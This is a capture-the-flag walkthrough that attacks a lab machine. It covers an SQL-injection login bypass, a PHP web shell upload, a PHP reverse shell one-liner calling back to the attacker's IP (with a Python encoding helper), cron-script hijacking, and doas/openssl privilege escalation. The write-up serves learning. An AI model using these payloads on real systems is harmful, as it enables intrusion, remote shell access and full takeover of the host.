Target IP: 10.10.22.19
Everything here is plotted! Enumeration is key!
There are three TCP ports open on the target machine: SSH on 22, HTTP on 80, and a second HTTP service on 445 (a port normally associated with SMB, but here it serves a web application).
Port 445: HTTP
A directory brute-force against this port turns up the interesting directory /management, as shown above.
The /management login page is shown above. I do not have credentials, and default ones such as admin:admin did not work.
However, the login form is vulnerable to SQL injection. Entering admin' OR '1'='1' -- // as the username bypassed authentication: the single quote closes the username string, OR '1'='1' makes the WHERE clause always true, and -- turns the rest of the query, including the password check, into a comment. I now have access to the web application on this port as the user admin.
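To make the bypass concrete, here is an added example (my own, not code from the room or the TMS application) that replays the payload against a constructed in-memory SQLite table. The schema, the sample rows and the query shape are assumptions; the real application hashes its passwords, so plaintext values are used only to keep the demo short. The vulnerable login splices the input into the SQL text, the parameterised one binds it as data.

```python
import sqlite3

# Constructed sample rows standing in for the TMS users table (assumed schema).
SEED_USERS = [("admin", "not-admin"), ("puser", "jsmith123")]

# The payload from the walkthrough, entered in the username field.
PAYLOAD = "admin' OR '1'='1' -- //"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SEED_USERS)
    return conn


def vulnerable_query(username, password):
    # Input is spliced straight into the SQL text, so the quotes and the
    # comment marker in it become SQL syntax instead of data.
    return ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))


def login_vulnerable(conn, username, password):
    # With PAYLOAD the statement becomes
    #   ... WHERE username = 'admin' OR '1'='1' -- //' AND password = '...'
    # so the password check is commented out and the first row is returned.
    row = conn.execute(vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    # Bound parameters: the driver passes the values separately from the query
    # text, so the quote and "--" in PAYLOAD are just characters to compare.
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_query(PAYLOAD, "anything"))
    print("vulnerable login  ->", login_vulnerable(db, PAYLOAD, "anything"))
    print("parameterised login ->", login_safe(db, PAYLOAD, "anything"))
```

The first row of the table happens to be admin, which is why the injected login lands on that account; with a different row order the bypass would still succeed, just as a different user.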
The User List feature can be used to edit user account details. I noticed that the admin user's profile picture can be changed to any file: there is no file type check, so PHP files are accepted too!
I created a simple PHP web shell and set it as the admin user's avatar as shell.php. The upload succeeded, but where did the file go?
Reviewing the page source revealed the upload location: /management/uploads, with the file saved as 1691847900_shell.php (the upload handler prefixes the original name with what appears to be a Unix timestamp).
And bingo! Sending id;whoami in the cmd parameter returned the output above. Time to upgrade this to a reverse shell!
Since the target already runs PHP, I can use a PHP reverse shell one-liner. URL-encoded, the payload I used is php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8444%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27. Decoded, that is php -r '$sock=fsockopen("10.14.55.153",8444);shell_exec("/bin/bash <&3 >&3 2>&3");', which opens a TCP connection back to my machine and attaches bash's stdin, stdout and stderr to it.
I started a listener on port 8444 (for example nc -lvnp 8444) and sent the payload through the web shell. The listener received a connection on port 8444, so I now have a foothold on the target machine.
The full URL with PHP payload: http://10.10.22.19:445/management/uploads/1691847900_shell.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8444%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
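The encoding step is where these one-liners usually break, so here is an added example (my own, not code from the room) that rebuilds the payload above from its plain-text form, checks it against the encoded string on this page, and decodes a web shell URL back to the command. The listener address and port are the ones used in the walkthrough; the helper names are mine. It is also a quick way to read back what was sent when reviewing web server logs.

```python
from urllib.parse import quote, unquote, urlsplit, parse_qs

# Location of the uploaded web shell, from the walkthrough.
WEBSHELL_URL = "http://10.10.22.19:445/management/uploads/1691847900_shell.php"

# The URL-encoded payload exactly as it appears in the walkthrough.
PAGE_ENCODED = ("php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8444%29%3B"
                "shell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27")


def reverse_shell_php(lhost, lport):
    # fsockopen() opens a TCP connection to the listener. The php process already
    # holds fds 0, 1 and 2, so the new socket lands on fd 3; that is why bash is
    # started with stdin, stdout and stderr redirected from/to fd 3.
    return ("php -r '$sock=fsockopen(\"%s\",%d);"
            "shell_exec(\"/bin/bash <&3 >&3 2>&3\");'" % (lhost, lport))


def webshell_url(cmd, base=WEBSHELL_URL, param="cmd"):
    # safe="" forces every reserved character through percent-encoding. A bare
    # '&' would start a new query parameter, '#' would become a fragment that
    # never reaches the server, and '+' would be decoded as a space.
    return "%s?%s=%s" % (base, param, quote(cmd, safe=""))


def decode_cmd(url, param="cmd"):
    # Recover the plain command from a web shell URL, e.g. from an access log.
    return parse_qs(urlsplit(url).query)[param][0]


if __name__ == "__main__":
    payload = reverse_shell_php("10.14.55.153", 8444)
    print("plain   :", payload)
    print("encoded :", quote(payload, safe=""))
    print("matches page:", quote(payload, safe="") == PAGE_ENCODED)
    print("decoded page:", unquote(PAGE_ENCODED))
    print(webshell_url("id;whoami"))
```

Note that the `;` in id;whoami is encoded as %3B too; left bare, some query parsers treat it as a parameter separator and the second command silently disappears.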
The file initialize.php contains the database credentials tms_user:Password@123.
Running find / -perm -u=s 2>/dev/null to list SUID binaries turned up the interesting binary /usr/bin/doas. Checking its configuration (/etc/doas.conf) shows that the user plot_admin can run openssl as root without entering a password. So I first need to escalate my privileges to this user.
Using the credentials tms_user:Password@123, I logged into MySQL on the target machine. There is a database called tms_db with an interesting table called users, which contains the two entries above. Is the puser account the same person as plot_admin?
I cracked the password hash 1254737c076cf867dc53d60a0364f38e with CrackStation (32 hex characters, the length of an unsalted MD5), which gave the password jsmith123, as shown above. However, this password did not work for the user plot_admin.
After some more enumeration, I found an interesting cron job that runs as plot_admin. I cannot modify the script itself; however, the directory the script lives in is writable by me, and write permission on a directory is enough to rename and create files in it even when the existing file is not writable.
I renamed the original backup.sh to backup_old.sh, created a new backup.sh containing my reverse shell, and made it executable (I used chmod 777, although chmod +x would have been enough). I started a listener on 8445, and after some time I got a connection back as plot_admin!
Back to the doas rule found earlier: running openssl as root through doas lets me read the root.txt flag. GG.
The user.txt flag.
The root.txt hash.